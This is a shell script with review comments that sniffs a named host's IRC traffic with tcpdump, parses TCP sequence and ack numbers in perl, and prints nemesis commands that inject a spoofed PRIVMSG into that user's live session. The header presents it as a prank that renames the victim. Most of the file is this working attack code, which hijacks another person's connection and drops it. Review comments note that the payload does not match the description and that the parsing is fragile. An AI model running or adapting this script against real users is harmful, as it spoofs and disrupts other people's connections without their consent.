#!/bin/sh
# Fun example using nemesis to inject a tcp packet.
#
# What we do is tcpdump for IRC traffic, then change their nickname to
# something very silly.
#
# However, tcp injection severs the connection because the server will
# ACK with the last sequence number, the real client will not understand
# this new sequence number and the connection will be lost.
#
# What do we need to spoof this?
# source and destination (hosts and ports)
# last sequence number
#
# How it is wired together (see the last line): tcpdump -S (absolute, not
# relative, sequence numbers) -l (line-buffered) output matching FILTER is
# piped into a perl -lne one-liner held in PERLCODE, which parses each
# captured line and PRINTS a candidate nemesis command line. Nothing here
# executes nemesis itself; the script's only output is text on stdout.
#
# NOTE(review): the header talks about changing a nickname, but the payload
# string below is a PRIVMSG to a channel, not a NICK command.

# BPF capture filter: only TCP traffic on port 6668 *sent by* the one
# hard-coded host, so replies from the server are never seen by the parser.
FILTER="tcp and port 6668 and src host fury.csh.rit.edu";

# The perl program is captured with backticks from a here-document whose
# delimiter is quoted ("CODE"), so the $-variables inside it are passed to
# perl literally rather than expanded by the shell.
#
# Under perl -lne: -n loops over every stdin line in $_, -l chomps input
# and appends a newline to each print, -e takes the code. $|=1 turns off
# stdout buffering so each parsed packet is printed as it arrives.
#
# Parsing is entirely positional on whitespace-split fields and assumes the
# older tcpdump line layout
#   "HH:MM:SS.. src.port > dst.port: FLAG seq:seq(len) ack N ..."
# i.e. $f[1]=source host.port, $f[3]=dest host.port:, $f[5]=seq range,
# $f[7]=ack number; lines that do not start with a two-digit timestamp are
# skipped, and a line whose 6th field is the literal 'ack' (a pure ACK with
# no seq range) is skipped via next.
# NOTE(review): newer tcpdump versions print additional tokens ("IP",
# "Flags", "seq", ...) which shift these field indices -- confirm the
# layout against the tcpdump version in use. Also, a perl match that fails
# leaves $1/$2 holding the previous successful capture, so a malformed
# field silently reuses stale host/port/seq values rather than aborting.
PERLCODE=`cat <<"CODE"
$|=1;
if (m/^[0-9]{2}:/) {
  @f = split(/\s+/); # Split up by field
  $f[1] =~ m/(.+)\.([^.]+)/; # $1 and $2 are now source host and port
  $srchost = $1; $srcport = $2;
  $f[3] =~ m/(.+)\.([^.]+):/; # $1 and $2 are now dest host and port
  $dsthost = $1; $dstport = $2;
  $f[5] =~ m/^[0-9]+\:([0-9]+)/; # $1 is the sequence number
  $seqnum = $1;
  # Give up if this is an ACK packet?
  next if ($f[5] eq 'ack');
  print "Seq: $f[5] / $seqnum";
  # Grab the ack seq aswell
  $acknum = $f[7];
  $nemesis = "nemesis tcp -D $dsthost -y $dstport -S $srchost -x $srcport -s $seqnum -a $acknum -fP -fA";
  $payload = "PRIVMSG #foobidyfoo :Hello there!";
  print "\n--------";
  print $_;
  print;
  print "echo \"$payload\" | $nemesis -P -";
  print "\n--------";
}
CODE
`

# Capture (needs privileges to open the interface) and feed each line to the
# parser above. Every match is echoed twice (print $_; print;) followed by
# the suggested command line, between "--------" separators.
tcpdump -Sl "$FILTER" | perl -lne "$PERLCODE"